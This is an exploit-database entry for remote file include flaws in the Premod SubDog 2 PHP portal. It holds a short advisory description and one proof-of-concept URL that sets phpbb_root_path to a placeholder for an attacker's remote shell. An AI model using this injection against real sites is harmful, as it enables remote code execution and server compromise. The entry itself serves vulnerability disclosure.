header-logo
Suggest Exploit
vendor:
SubDog 2
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
Unknown
CWE
Product Name: SubDog 2
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Premod SubDog 2 Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22912/info
 
Premod SubDog 2 is prone to multiple remote file-include vulnerabilities.
 
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
 
http://www.example.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=[Shell-Attack]